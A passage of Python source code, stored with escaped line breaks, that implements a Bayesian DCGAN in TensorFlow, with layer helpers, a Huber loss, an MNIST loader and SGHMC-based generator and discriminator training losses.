tensorflow graph\r\n :param with_w: True => return w and biases also\r\n :param w: weight variables for convolution layer\r\n :param biases: bias variables for convolution layer\r\n :return: output of transposed_convolution layer\r\n \"\"\"\r\n\r\n with tf.variable_scope(name,reuse=tf.AUTO_REUSE):\r\n # filter = [h, w, output_channels, in_channels]\r\n if w is None:\r\n w = tf.get_variable('w', [k_h, k_w, output_shape[-1], input_.get_shape()[-1]],\r\n initializer=tf.random_normal_initializer(stddev=stddev));\r\n\r\n deconv = tf.nn.conv2d_transpose(input_, w, output_shape=output_shape,\r\n strides=[1, d_h, d_w, 1]);\r\n\r\n if biases is None:\r\n biases = tf.get_variable('biases', [output_shape[-1]],\r\n initializer=tf.constant_initializer(0.0));\r\n\r\n deconv = tf.reshape(tf.nn.bias_add(deconv, biases), deconv.get_shape());\r\n\r\n if with_w:\r\n return deconv, w, biases;\r\n else:\r\n return deconv;\r\n\r\n\r\ndef linear(input_, output_size, scope=None, stddev=0.02, bias_start=0.0,\r\n with_w=False, matrix=None, bias=None):\r\n\r\n \"\"\" Make a full-connected layer\r\n :param input_: input data\r\n :param output_size: size of output\r\n :param scope: variable scope for tensorflow graph\r\n :param stddev: standard deviation for initializing w\r\n :param bias_start:\r\n :param with_w: True => return w and biases also\r\n :param matrix: weight variables for full-connected layer\r\n :param bias: bias variables for full-connected layer\r\n :return: output of full-connected layer\r\n \"\"\"\r\n shape = input_.get_shape().as_list();\r\n\r\n with tf.variable_scope(scope or \"Linear\",reuse=tf.AUTO_REUSE):\r\n if matrix is None:\r\n matrix = tf.get_variable(\"Matrix\", [shape[1], output_size], tf.float32,\r\n tf.random_normal_initializer(stddev=stddev));\r\n\r\n if bias is None:\r\n bias = tf.get_variable(\"bias\", [output_size],\r\n initializer=tf.constant_initializer(bias_start))\r\n\r\n if with_w:\r\n return tf.matmul(input_, matrix) + bias, matrix, bias;\r\n else:\r\n return tf.matmul(input_, matrix) + bias;\r\n\r\n\r\n\"\"\" Some util functions for Convolution\r\nout_size = (input_size + 2padding - kernel_size)/stride + 1\r\n\"\"\"\r\ndef conv_out_size(size, stride):\r\n co = int(math.ceil(size / float(stride)));\r\n return co;\r\n\r\n\r\ndef kernel_sizer(size, stride):\r\n ko = int(math.ceil(size / float(stride)));\r\n\r\n if ko % 2 == 0:\r\n ko = ko+1;\r\n return ko;\r\n\r\n\r\ndef get_strides(num_layers, num_pool):\r\n interval = int(math.floor(num_layers/float(num_pool)));\r\n strides = np.array([1]*num_layers);\r\n strides[0:interval*num_pool:interval] = 2;\r\n return strides;\r\n\r\n#TODO\r\n\"\"\" Huber loss \r\nReference : https://en.wikipedia.org/wiki/Huber_loss(다시보기)\r\n - a loss function used in robust regression\r\n , which is less sensitive to outliers in data than the squared error loss\r\n 1. Original Definition\r\n : L_delta(a) \r\n = 0.5*pow(a, 2) ,if abs(a) < delta\r\n = delta(abs(a) - 0.5delta) ,otherwise\r\n \r\n 2. Let a = y - f(x) where y: real value(label) and f(x): predicted value.\r\n Then the Huber loss between real and predicted values is given by\r\n : L_delta(real, pred)\r\n = 0.5*pow(real - pred, 2) ,if abs(real-pred) < delta\r\n = delta(abs(real - pred) -0.5pow(delta, 2) ,otherwise\r\n \r\n : L_delta(real, pred)\r\n = 0.5*pow(res, 2) ,if res < delta\r\n = delta*res - 0.5pow(delta, 2) ,otherwise\r\n where res = abs(real - pred) \r\n\"\"\"\r\ndef huber_loss(labels, predictions, delta=1.0):\r\n residual = tf.abs(predictions - labels);\r\n condition = tf.less(residual, delta);\r\n ret1 = 0.5 * tf.square(residual);\r\n ret2 = delta*residual - 0.5*tf.square(delta);\r\n\r\n return tf.where(condition, ret1, ret2);\r\n\r\n\r\n\"\"\" Classes for datasets\"\"\"\r\nclass MNIST:\r\n def __init__(self, data_dir=\"./mnist/data/\"):\r\n from tensorflow.examples.tutorials.mnist import input_data;\r\n self.mnist = input_data.read_data_sets(data_dir, one_hot=True);\r\n self.x_dim = [28, 28, 1];\r\n self.num_classes = 10;\r\n self.dataset_size = self.mnist.train.images.shape[0];\r\n\r\n\r\n def next_batch(self, batch_size, class_id=None):\r\n \"\"\"\r\n :param batch_size: batch size\r\n :param class_id: an integer for the digit to sample images from mnist\r\n :return: batch data\r\n \"\"\"\r\n if class_id is None:\r\n image_batch, labels = self.mnist.train.next_batch(batch_size);\r\n new_image_batch = np.array([(image_batch[n] * 2. - 1.).reshape((28, 28, 1))\r\n for n in range(image_batch.shape[0])]);\r\n\r\n return new_image_batch, labels;\r\n else:\r\n class_id_batch = np.array([]);\r\n while class_id_batch.shape[0] < batch_size:\r\n image_batch, labels = self.mnist.train.next_batch(batch_size);\r\n image_batch = np.array([(image_batch[n]*2. - 1.).reshape((28, 28, 1))\r\n for n in range(image_batch.shape[0])]);\r\n\r\n class_id_idx = np.argmax(labels, axis=1) == class_id;\r\n\r\n if len(class_id_idx) > 0:\r\n if class_id_batch.shape[0] == 0:\r\n class_id_batch = image_batch[class_id_batch];\r\n else:\r\n class_id_batch = np.concatenate([class_id_batch, image_batch[class_id_idx]]);\r\n\r\n labels = np.zeros((batch_size, 10));\r\n labels[:, class_id] = 1.0;\r\n return class_id_batch[:batch_size], labels;\r\n\r\n\r\n def test_batch(self, batch_size):\r\n image_batch, labels = self.mnist.test.next_batch(batch_size);\r\n new_image_batch = np.array([(image_batch[n] * 2. - 1.).reshape((28, 28, 1))\r\n for n in range(image_batch.shape[0])]);\r\n\r\n return new_image_batch, labels;\r\n\r\n def get_test_set(self):\r\n test_imgs = self.mnist.test.images;\r\n test_images = np.array([(test_imgs[n]*2. - 1.).reshape((28, 28, 1))\r\n for n in range(test_imgs.shape[0])]);\r\n test_labels = self.mnist.test.labels;\r\n\r\n return test_images, test_labels;\r\n\r\n\r\n\r\n\r\n\r\n\"\"\" Main : Bayesian GAN \"\"\"\r\nclass BDCGAN(object):\r\n def __init__(self, x_dim, z_dim, dataset_size, batch_size=64,\r\n g_filter=64, d_filter=64,prior_std=1.0, num_layer=4,\r\n num_classes=2,\r\n J=1, M=1, J_d=None, eta=2e-4,\r\n alpha=0.01, lr=0.0002, optimizer=\"adam\",\r\n DCGAN=False):\r\n \"\"\"\r\n ================================================================\r\n \r\n :param x_dim: dim of input data(e.g mnist) for D\r\n :param z_dim: dim of input data(noise) for G\r\n :param dataset_size: the size of data in real data distribution\r\n :param batch_size: batch size for mini-batch training\r\n :param g_filter: dimension of convolution filter for G\r\n :param d_filter: dimension of convolution filter for D\r\n :param prior_std: Neural network prior std\r\n :param num_layer: the number of layers in the network (G or D)\r\n ================================================================\r\n # TODO\r\n \r\n : (Stochastic Gradient Hamiltonian Monte Carlo)\r\n :param J: the number of MC-samples of z to integrate in G (paper J_g)\r\n :param M: the number of samplings in SGHMC\r\n :param J_d: the number of MC-samples of z to integrate in D\r\n :param eta:\r\n :param alpha:\r\n ================================================================\r\n Classic DCGAN / False=>Bayesian GAN\r\n \"\"\"\r\n channels = x_dim[2];\r\n\r\n self.is_gray = (channels==1);\r\n self.optimizer = optimizer.lower();\r\n self.dataset_size = dataset_size;\r\n self.batch_size = batch_size;\r\n\r\n self.K = num_classes #Fake or real classes\r\n self.x_dim = x_dim;\r\n self.z_dim = z_dim;\r\n\r\n self.g_filter = g_filter;\r\n self.d_filter = d_filter;\r\n self.channels = channels;\r\n\r\n self.lr = lr;\r\n\r\n\r\n # Information for Bayes GAN\r\n self.prior_std = prior_std;\r\n self.num_G = J;\r\n self.num_D = J_d if J_d is not None else 1;\r\n self.num_mcmc = M;\r\n self.eta = eta;\r\n self.alpha = alpha;\r\n\r\n # Information for classic DCGAN\r\n self.DCGAN = DCGAN;\r\n if self.DCGAN:\r\n assert self.num_G == 1 and self.num_D == 1 and self.num_mcmc == 1, \\\r\n \"Invalid settings(J, J_d, M) for Classic DCGAN\";\r\n # TODO\r\n self.noise_std = np.sqrt(2*self.alpha*self.eta);\r\n # TODO\r\n self.num_pool = 4;\r\n # max_num_dfs : maximum number of filters\r\n self.max_num_dfs = 512;\r\n # G_strides : stride for G\r\n self.G_strides = get_strides(num_layer, self.num_pool);\r\n # D_strides = stride for D\r\n self.D_strides = self.G_strides;\r\n\r\n\r\n\r\n num_dfs = np.cumprod(np.array([self.d_filter] + list(self.D_strides)))[:-1];\r\n\r\n num_dfs[num_dfs >= self.max_num_dfs] = self.max_num_dfs;\r\n\r\n # num_d_features : list of the number of features in layers for D\r\n self.num_d_features = list(num_dfs);\r\n # num_g_features : list of the number of features in layers for G\r\n # : inverse of num_d_filters\r\n self.num_g_features = self.num_d_features[::-1];\r\n\r\n # D_batch_norm : Dictionary for Batch normalization layers for D\r\n self.D_batch_norm = None;\r\n # D_weight_dims : List of dimensions for W in each layer of D\r\n self.D_weight_dims = OrderedDict();\r\n # D_kernel_sizes : List of kernel size in Convolution layer in D\r\n self.D_kernel_sizes = None;\r\n\r\n # G_batch_norm : Dictionary for Batch normalization layers for G\r\n self.G_batch_norm = None;\r\n self.G_output_dims = OrderedDict();\r\n # G_weight_dims : dimensions for W in each layer of G\r\n self.G_weight_dims = OrderedDict();\r\n # G_kernel_sizes : List of kernel size in Convolution layer in G\r\n self.G_kernel_sizes = None;\r\n\r\n self.inputs = None;\r\n self.z = None;\r\n self.z_sampler = None;\r\n self.G_param_list = None;\r\n self.D_param_list = None;\r\n\r\n self.D_learning_rate = None;\r\n self.D_vars = None;\r\n\r\n # d_losses : list of d_loss of each D in SGHMC\r\n # d_train_ops : list minimizing operator of each D in SGHMC\r\n # d_train_ops_adam :\r\n self.d_losses, self.d_train_ops, self.d_train_ops_adam = None, None, None;\r\n\r\n self.G_learning_rate = None;\r\n self.G_vars = None;\r\n # g_losses : list of d_loss of each G in SGHMC\r\n # g_train_ops : list minimizing operator of each G in SGHMC\r\n # g_train_ops_adam :\r\n self.g_losses, self.g_train_ops, self.g_train_ops_adam = None, None, None;\r\n\r\n self.G_sampler = None;\r\n\r\n self.construct_from_hypers(g_kernel_size=5, g_strides=[2,2,2,2],\r\n d_kernel_size=5, d_strides=[2,2,2,2],\r\n num_dfs=self.num_d_features,\r\n num_gfs=self.num_g_features);\r\n\r\n\r\n\r\n self.build_graph();\r\n\r\n def construct_from_hypers(self,\r\n g_kernel_size=5, g_strides=[2,2,2,2],\r\n d_kernel_size=5, d_strides=[2,2,2,2],\r\n num_dfs=None, num_gfs=None):\r\n \"\"\"\r\n 1. _batch_norm : a list of batch normalization layer\r\n 2. _weight_dims : a ordered dict of tuples of the shape of W and b in each layer\r\n 3.\r\n :param g_kernel_size: starting kernel size of G\r\n :param g_strides: a list of strides of layers in G\r\n :param d_kernel_size: starting kernel size of D\r\n :param d_strides: a list of strides of layers in D\r\n :param num_dfs: list of the number of filters in Convolution layers for D\r\n :param num_gfs: list of the number of filters in Convolution layers for G\r\n \"\"\"\r\n\r\n\r\n\r\n self.D_batch_norm = AttributeDict([(\"d_bn\"+str(i), batch_norm(name=\"d_bn\"+str(i)))\r\n for i in range(len(d_strides))]);\r\n self.G_batch_norm = AttributeDict([(\"g_bn\"+str(i), batch_norm(name=\"g_bn\"+str(i)))\r\n for i in range(len(g_strides))]);\r\n\r\n if num_dfs is None:\r\n # Default : 64 -> 128 -> 256 -> 512\r\n num_dfs = [self.d_filter, self.d_filter*2, self.d_filter*4, self.d_filter*8];\r\n\r\n if num_gfs is None:\r\n # Default : 512 -> 256 -> 128 -> 64\r\n num_gfs = [self.g_filter*8, self.g_filter*4, self.g_filter*2, self.g_filter];\r\n\r\n\r\n # Check the validation of hyper-parameters\r\n assert len(g_strides) == len(num_gfs), \"Invalid Hyper-parameters\"\r\n assert len(d_strides) == len(num_dfs), \"Invalid Hyper-parameters\"\r\n\r\n\r\n\r\n # Generator\r\n g_h, g_w = self.x_dim[0], self.x_dim[1];\r\n ks = g_kernel_size;\r\n self.G_kernel_sizes = [ks];\r\n\r\n num_gfs = num_gfs + [self.channels];\r\n\r\n # Add shape of weights for convolution layer\r\n for layer in range(len(g_strides))[::-1]:\r\n self.G_output_dims[\"g_h\"+str(layer+1)+\"_out\"] = (g_h, g_w);\r\n\r\n assert g_strides[layer] <=2, \"Invalid Stride\";\r\n assert ks % 2 == 1, \"Invalid Kernel Size\";\r\n\r\n self.G_weight_dims[\"g_h\"+str(layer+1)+\"_W\"] = (ks, ks, num_gfs[layer+1], num_gfs[layer]);\r\n self.G_weight_dims[\"g_h\" + str(layer + 1) + \"_b\"] = (num_gfs[layer+1],);\r\n g_h, g_w = conv_out_size(g_h, g_strides[layer]), conv_out_size(g_w, g_strides[layer]);\r\n ks = kernel_sizer(ks, g_strides[layer]);\r\n self.G_kernel_sizes.append(ks);\r\n\r\n # Add shape of weights for a full connected layer\r\n self.G_weight_dims.update(OrderedDict([(\"g_h0_lin_W\", (self.z_dim, num_gfs[0] * g_h * g_w)),\r\n (\"g_h0_lin_b\", (num_gfs[0] * g_h * g_w,))]))\r\n\r\n self.G_output_dims[\"g_h0_out\"] = (g_h, g_w);\r\n\r\n\r\n # Discriminator\r\n d_h, d_w = self.x_dim[0], self.x_dim[1];\r\n num_dfs = [self.channels] + num_dfs;\r\n\r\n ks = d_kernel_size;\r\n self.D_kernel_sizes = [ks];\r\n\r\n for layer in range(len(d_strides)):\r\n assert d_strides[layer]<=2, \"Invalid Stride\";\r\n assert ks % 2 == 1, \"Invalid Kernel Size\";\r\n\r\n self.D_weight_dims[\"d_h\"+str(layer)+\"_W\"] = (ks, ks, num_dfs[layer], num_dfs[layer+1]);\r\n self.D_weight_dims[\"d_h\"+str(layer)+\"_b\"] = (num_dfs[layer+1],);\r\n d_h, d_w = conv_out_size(d_h, d_strides[layer]), conv_out_size(d_w, d_strides[layer]);\r\n ks = kernel_sizer(ks, d_strides[layer]);\r\n self.D_kernel_sizes.append(ks);\r\n\r\n self.D_weight_dims.update(OrderedDict([(\"d_h_end_lin_W\", (num_dfs[-1] * d_h * d_w, num_dfs[-1])),\r\n (\"d_h_end_lin_b\", (num_dfs[-1],)),\r\n (\"d_h_out_lin_W\", (num_dfs[-1], self.K)),\r\n (\"d_h_out_lin_b\", (self.K,))]))\r\n\r\n def Discriminator(self, image, K, d_params, train=True):\r\n \"\"\"\r\n Image\r\n => (Convolution => Batch Norm => Leaky ReLU)\r\n => (Convolution => Batch Norm => Leaky ReLU)\r\n => ......\r\n => Full connected => Leaky ReLU : h_end\r\n => Full connected : h_out = logit\r\n => output : softmax(h_out) = prob\r\n :param image: image data\r\n :param K: output size of D (unsupervised : 2)\r\n :param d_params: Discriminator parameters for training/evaluation\r\n :param train: True for train(update the params) (why? Batch norm)\r\n :return: softmax(h_out), h_out, [h_end]\r\n \"\"\"\r\n\r\n with tf.variable_scope(\"discriminator\",reuse=tf.AUTO_REUSE) as scope:\r\n\r\n h = image;\r\n\r\n\r\n for layer in range(len(self.D_strides)):\r\n\r\n # self.D_weight_dims[layer_W] : (kernel_h, kernel_w, features in layer+1, features in layer)\r\n if layer == 0:\r\n h = tf.nn.leaky_relu(conv2d(h,\r\n self.D_weight_dims[\"d_h\" + str(layer) + \"_W\"][-1],\r\n name=\"d_h\" + str(layer) + \"_conv\",\r\n k_h=self.D_kernel_sizes[layer],\r\n k_w=self.D_kernel_sizes[layer],\r\n d_h=self.D_strides[layer],\r\n d_w=self.D_strides[layer],\r\n w=d_params[\"d_h\" + str(layer) + \"_W\"],\r\n biases=d_params[\"d_h\" + str(layer) + \"_b\"]));\r\n else:\r\n h = tf.nn.leaky_relu(self.D_batch_norm[\"d_bn\"+str(layer)](\r\n conv2d(h,\r\n self.D_weight_dims[\"d_h\" + str(layer) + \"_W\"][-1],\r\n name=\"d_h\" + str(layer) + \"_conv\",\r\n k_h=self.D_kernel_sizes[layer],\r\n k_w=self.D_kernel_sizes[layer],\r\n d_h=self.D_strides[layer],\r\n d_w=self.D_strides[layer],\r\n w=d_params[\"d_h\" + str(layer) + \"_W\"],\r\n biases=d_params[\"d_h\" + str(layer) + \"_b\"]),train=train));\r\n\r\n\r\n h_end = tf.nn.leaky_relu(linear(input_=tf.reshape(h, [self.batch_size, -1]),\r\n output_size=self.d_filter*4,\r\n scope=\"d_h_end_lin\",\r\n matrix=d_params.d_h_end_lin_W,\r\n bias=d_params.d_h_end_lin_b));\r\n h_out = linear(input_=h_end, output_size=K,\r\n scope=\"d_h_out_lin\",\r\n matrix=d_params.d_h_out_lin_W, bias=d_params.d_h_out_lin_b);\r\n\r\n return tf.nn.softmax(h_out), h_out, [h_end];\r\n\r\n def Generator(self, z, g_params):\r\n \"\"\"\r\n Noise\r\n => Full connected\r\n => (Transpose Convolution => Batch norm => ReLU)\r\n => (Transpose Convolution => Batch norm => ReLU)\r\n => ......\r\n => Transpose Convolution\r\n => tanh(h)\r\n :param z: input noise\r\n :param g_params: Generator parameters for training/evaluation\r\n :return: generated image\r\n \"\"\"\r\n\r\n with tf.variable_scope(\"generator\",reuse=tf.AUTO_REUSE) as scope:\r\n h = linear(input_=z, output_size=self.G_weight_dims[\"g_h0_lin_W\"][-1],\r\n scope=\"g_h0_lin\", matrix=g_params.g_h0_lin_W, bias=g_params.g_h0_lin_b);\r\n h = tf.nn.relu(self.G_batch_norm.g_bn0(h));\r\n\r\n h = tf.reshape(h, [self.batch_size, self.G_output_dims[\"g_h0_out\"][0],\r\n self.G_output_dims[\"g_h0_out\"][1], -1]);\r\n\r\n for layer in range(1, len(self.G_strides)+1):\r\n # self.G_weight_dims[layer_W] : (kernel_h, kernel_w, features in layer+1, features in layer)\r\n # self.G_output_dims[layer] : (output_h, output_w)\r\n # out_shape = [batch, output_h, output_w, features in next layer]\r\n out_shape = [self.batch_size, self.G_output_dims[\"g_h\"+str(layer)+\"_out\"][0],\r\n self.G_output_dims[\"g_h\" + str(layer) + \"_out\"][1],\r\n self.G_weight_dims[\"g_h\"+str(layer)+\"_W\"][-2]];\r\n\r\n h = deconv2d(input_=h,\r\n output_shape=out_shape,\r\n k_h=self.G_kernel_sizes[layer-1], k_w=self.G_kernel_sizes[layer-1],\r\n d_h=self.G_strides[layer-1], d_w=self.G_strides[layer-1],\r\n name=\"g_h\"+str(layer),\r\n w=g_params[\"g_h\"+str(layer)+\"_W\"],\r\n biases=g_params[\"g_h\"+str(layer)+\"_b\"]);\r\n\r\n if layer < len(self.G_strides):\r\n h = tf.nn.relu(self.G_batch_norm[\"g_bn\"+str(layer)](h));\r\n\r\n\r\n return tf.nn.tanh(h);\r\n\r\n\r\n def _get_optimizer(self, lr):\r\n if self.optimizer == 'adam':\r\n return tf.train.AdamOptimizer(learning_rate=lr, beta1=0.5);\r\n elif self.optimizer =='sgd':\r\n return tf.train.MomentumOptimizer(learning_rate=lr, momentum=0.5);\r\n else:\r\n raise ValueError(\"Optimizer must be either 'adam' or 'sgd'\");\r\n\r\n\r\n def initialize_weights(self, scope_str):\r\n \"\"\" Initialize the weights with normal distribution\r\n To use SGHMC algorithm, there are (# MC samples)*(# SGHMC samples) set of\r\n parameters in G/D\r\n :param scope_str: 'generator' or 'discriminator'\r\n :return: parameters list\r\n \"\"\"\r\n\r\n if scope_str == \"generator\":\r\n weight_dims = self.G_weight_dims;\r\n numz = self.num_G\r\n elif scope_str == \"discriminator\":\r\n weight_dims = self.D_weight_dims;\r\n numz = self.num_D\r\n else:\r\n raise RuntimeError(\"invalid scope! : 'generator' or 'discriminator' \");\r\n\r\n param_list = [];\r\n\r\n with tf.variable_scope(scope_str,reuse=tf.AUTO_REUSE) as scope:\r\n # numz : MC samples\r\n for i in range(numz):\r\n # num_mcmc : SGHMC samples\r\n for m in range(self.num_mcmc):\r\n wgts = AttributeDict();\r\n for name, shape in weight_dims.items():\r\n wgts[name] = tf.get_variable(\"%s_%04d_%04d\" %(name, i, m),\r\n shape,\r\n initializer=tf.random_normal_initializer(stddev=0.02));\r\n param_list.append(wgts);\r\n\r\n return param_list;\r\n\r\n def build_graph(self):\r\n \"\"\"\r\n Make BDCGAN graph\r\n \"\"\"\r\n\r\n \"\"\" Make input placeholders for D and G\"\"\"\r\n self.inputs = tf.placeholder(tf.float32,\r\n [self.batch_size] + self.x_dim,\r\n name=\"real_images\");\r\n\r\n self.z = tf.placeholder(tf.float32,\r\n [self.batch_size, self.z_dim, self.num_G], name=\"z\");\r\n self.z_sampler = tf.placeholder(tf.float32,\r\n [self.batch_size, self.z_dim], name=\"z_sampler\");\r\n\r\n \"\"\" Initialize Generator/Discriminator weights \"\"\"\r\n self.G_param_list = self.initialize_weights(\"generator\");\r\n self.D_param_list = self.initialize_weights(\"discriminator\");\r\n\r\n \"\"\" Algorithm 1 : Second Iteration - Update params in D's\r\n - 1) Make a list of variables of all D's to train\r\n - 2) Make a list of learning rate \r\n \"\"\"\r\n self.D_learning_rate = tf.placeholder(tf.float32, shape=[]);\r\n\r\n train_vars = tf.trainable_variables();\r\n self.D_vars = [];\r\n\r\n for i in range(self.num_D):\r\n for m in range(self.num_mcmc):\r\n self.D_vars.append(\r\n [var for var in train_vars if 'd_' in var.name and \"_%04d_%04d\" % (i, m) in var.name]);\r\n\r\n\r\n\r\n \"\"\" Algorithm 1 : Second Iteration - Update params in D's\r\n - Make d_losses and optimizers\r\n \"\"\"\r\n\r\n self.d_losses, self.d_train_ops, self.d_train_ops_adam = [], [], [];\r\n\r\n\r\n for di, d_params in enumerate(self.D_param_list):\r\n d_probs, d_logits, _ = self.Discriminator(self.inputs, self.K, d_params);\r\n\r\n\r\n # const_label[:, 1] = 1.0 <= data sampled from the real distribution\r\n const_labels = np.zeros((self.batch_size, self.K));\r\n const_labels[:, 1] = 1.0;\r\n\r\n # d_loss_real : same for DCGAN\r\n d_loss_real = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(\r\n logits=d_logits, labels=tf.constant(const_labels)\r\n ));\r\n\r\n\r\n d_loss_fakes = [];\r\n \"\"\" Algorithm 1 : Second Iteration \r\n - sum_{i,k} p(theta_d|z^{(i)}, theta_d^{k,m})\r\n \"\"\"\r\n for gi, g_params in enumerate(self.G_param_list):\r\n # D(G(z))\r\n d_probs, d_logits, _ = self.Discriminator(self.Generator(self.z[:, :, gi % self.num_G], g_params),\r\n self.K, d_params);\r\n # const_label[:, 0]=0.0 <= data sample from the fake distribution\r\n const_labels = np.zeros((self.batch_size, self.K));\r\n const_labels[:, 0] = 1.0;\r\n\r\n # d_fake_loss_ : same for DCGAN\r\n # : there are J_G*num_MCMC(total number of G) d_fake_loss for each discriminator\r\n d_loss_fake_ = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(\r\n logits=d_logits, labels=tf.constant(const_labels)\r\n ));\r\n\r\n d_loss_fakes.append(d_loss_fake_);\r\n\r\n\r\n d_losses = [];\r\n for d_loss_fake_ in d_loss_fakes:\r\n # d_loss = d_real + d_loss in DCGAN\r\n # there is only one d_loss_real\r\n # there are num_G d_loss_fake\r\n # => d_loss_real*float(self.num_G)\r\n d_loss_ = d_loss_real*float(self.num_G) + d_loss_fake_;\r\n\r\n\r\n if not self.DCGAN:\r\n # SGHMC part : Add prior and noise\r\n d_loss_ += self.D_prior(d_params) + self.D_noise(d_params);\r\n\r\n d_losses.append(tf.reshape(d_loss_, [1]));\r\n\r\n \"\"\"\r\n tf.reduce_logsumexp(input_tensor, axis)\r\n : log(sum(exp(elements across dimensions of a tensor)))\r\n \"\"\"\r\n d_loss = tf.reduce_logsumexp(tf.concat(d_losses, 0));\r\n\r\n self.d_losses.append(d_loss);\r\n\r\n d_optimizer = self._get_optimizer(self.D_learning_rate);\r\n self.d_train_ops.append(\r\n d_optimizer.minimize(d_loss, var_list=self.D_vars[di]));\r\n d_optimizer_adam = tf.train.AdamOptimizer(learning_rate=self.D_learning_rate,\r\n beta1=0.5);\r\n self.d_train_ops_adam.append(\r\n d_optimizer_adam.minimize(d_loss, var_list=self.D_vars[di]));\r\n\r\n\r\n \"\"\" REPEAT THE CODE for Algorithm 1 : Second Iteration w.r.t G\"\"\"\r\n \"\"\" Algorithm 1 : First Iteration - Update params in G's\r\n - 1) Make a list of variables of all G's to train\r\n - 2) Make a list of learning rate \r\n \"\"\"\r\n self.G_learning_rate = tf.placeholder(tf.float32, shape=[]);\r\n self.G_vars = [];\r\n\r\n for i in range(self.num_G):\r\n for m in range(self.num_mcmc):\r\n self.G_vars.append(\r\n [var for var in train_vars if 'g_' in var.name and \"_%04d_%04d\" % (i, m) in var.name]);\r\n\r\n \"\"\" Algorithm 1 : First Iteration - Update params in G's\r\n - Make g_losses and optimizers\r\n \"\"\"\r\n self.g_losses, self.g_train_ops, self.g_train_ops_adam = [], [], [];\r\n\r\n for gi, g_params in enumerate(self.G_param_list):\r\n gi_losses = [];\r\n\r\n for d_params in self.D_param_list:\r\n # D(G(z))\r\n d_prob, d_logit, d_feature_fake = self.Discriminator(\r\n self.Generator(self.z[:, :, gi % self.num_G], g_params),\r\n self.K, d_params\r\n );\r\n _, _, d_feature_real = self.Discriminator(self.inputs, self.K, d_params);\r\n\r\n # const_label[:, 1] = 1.0 <= data sampled from the real distribution\r\n const_labels = np.zeros((self.batch_size, self.K));\r\n const_labels[:, 1] = 1.0;\r\n\r\n # g_loss_ : classic loss\r\n g_loss_ = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(\r\n logits=d_logit, labels=tf.constant(const_labels)\r\n ));\r\n\r\n g_loss_ += tf.reduce_mean(\r\n huber_loss(d_feature_real[-1], d_feature_fake[-1]));\r\n\r\n if not self.DCGAN:\r\n # SGHMC part : Add prior and noise\r\n g_loss_ += self.G_prior(g_params) + self.G_noise(g_params);\r\n\r\n gi_losses.append(tf.reshape(g_loss_, [1]));\r\n\r\n \"\"\"\r\n tf.reduce_logsumexp(input_tensor, axis)\r\n : log(sum(exp(elements across dimensions of a tensor)))\r\n \"\"\"\r\n g_loss = tf.reduce_logsumexp(tf.concat(gi_losses, 0));\r\n self.g_losses.append(g_loss);\r\n\r\n g_optimizer = self._get_optimizer(self.G_learning_rate);\r\n self.g_train_ops.append(\r\n g_optimizer.minimize(g_loss, var_list=self.G_vars[gi]));\r\n\r\n g_optimizer_adam = tf.train.AdamOptimizer(learning_rate=self.G_learning_rate,\r\n beta1=0.5);\r\n self.g_train_ops_adam.append(\r\n g_optimizer_adam.minimize(g_loss, var_list=self.G_vars[gi]));\r\n\r\n\r\n\r\n\r\n \"\"\" Make samplers \"\"\"\r\n self.G_sampler = [];\r\n\r\n for gi, g_params in enumerate(self.G_param_list):\r\n self.G_sampler.append(self.Generator(self.z_sampler, g_params));\r\n\r\n \"\"\" For g_loss and d_loss (Bayesian)\"\"\"\r\n\r\n def G_prior(self, g_params):\r\n \"\"\"\r\n Let W be a weight parameter in g_params\r\n W_normal = W/prior_std (element wise)\r\n loss_W = average sum of square of entries of W_normal\r\n\r\n prior_loss = sum of loss_W along W : params in g_params\r\n\r\n \"\"\"\r\n with tf.variable_scope(\"generator\",reuse=tf.AUTO_REUSE) as scope:\r\n prior_loss = 0.0;\r\n for var in g_params.values():\r\n nn = tf.divide(var, self.prior_std);\r\n prior_loss += tf.reduce_mean(tf.multiply(nn, nn));\r\n\r\n prior_loss /= self.dataset_size;\r\n\r\n return prior_loss;\r\n\r\n def G_noise(self, g_params):\r\n \"\"\"\r\n A noise for SGHMC\r\n : noise is sampled from N(0, self.noise_std)\r\n where self.noise_std = np.sqrt(2 * self.alpha * self.eta) (in Algorithm 1)\r\n\r\n To use gradient descent,\r\n define noise_loss = W*noise where W is a parameter in g_params\r\n \"\"\"\r\n with tf.variable_scope(\"generator\",reuse=tf.AUTO_REUSE) as scope:\r\n noise_loss = 0.0;\r\n\r\n for name, var in g_params.items():\r\n # noise_ ~ N(0, noise_std*shape of var)\r\n # noise_.sample() : a single sample from the noise\r\n noise_ = tf.contrib.distributions.Normal(loc=0., scale=self.noise_std*tf.ones(var.get_shape()));\r\n noise_loss += tf.reduce_mean(var*noise_.sample());\r\n\r\n noise_loss /= self.dataset_size;\r\n return noise_loss;\r\n\r\n def D_prior(self, d_params):\r\n with tf.variable_scope(\"discriminator\",reuse=tf.AUTO_REUSE) as scope:\r\n prior_loss = 0.0;\r\n for var in d_params.values():\r\n nn = tf.divide(var, self.prior_std);\r\n prior_loss += tf.reduce_mean(tf.multiply(nn, nn));\r\n\r\n prior_loss /= self.dataset_size;\r\n\r\n return prior_loss;\r\n\r\n def D_noise(self, d_params):\r\n \"\"\"\r\n A noise for SGHMC\r\n : noise is sampled from N(0, self.noise_std)\r\n where self.noise_std = np.sqrt(2 * self.alpha * self.eta) (in Algorithm 1)\r\n\r\n To use gradient descent,\r\n define noise_loss = W*noise where W is a parameter in g_params\r\n \"\"\"\r\n with tf.variable_scope(\"discriminator\",reuse=tf.AUTO_REUSE) as scope:\r\n noise_loss = 0.0;\r\n\r\n for name, var in d_params.items():\r\n # noise_ ~ N(0, noise_std*shape of var)\r\n # noise_.sample() : a single sample from the noise\r\n noise_ = tf.contrib.distributions.Normal(loc=0., scale=self.noise_std * tf.ones(var.get_shape()));\r\n noise_loss += tf.reduce_mean(var * noise_.sample());\r\n\r\n noise_loss /= self.dataset_size;\r\n return noise_loss;\r\n\r\n \"\"\" Information for the Network \"\"\"\r\n def print_Weight_info(self):\r\n print(\"===============================================================\")\r\n print(\" Generator \");\r\n print(\" 1. Weight dims\");\r\n for k, v in self.G_weight_dims.items():\r\n print(\"{} : \".format(k), end=\" \");\r\n print(v);\r\n print(\" 2. kernel size \");\r\n print(self.G_kernel_sizes);\r\n\r\n print(\" 3. output dims \");\r\n for k, v in self.G_output_dims.items():\r\n print(\"{} : \".format(k), end=\" \");\r\n print(v);\r\n\r\n print(\" 4. num_gfs \");\r\n print(self.num_g_features)\r\n print(\"===============================================================\")\r\n print(\" Discriminator\");\r\n print(\" 1. Weight dims\");\r\n for k, v in 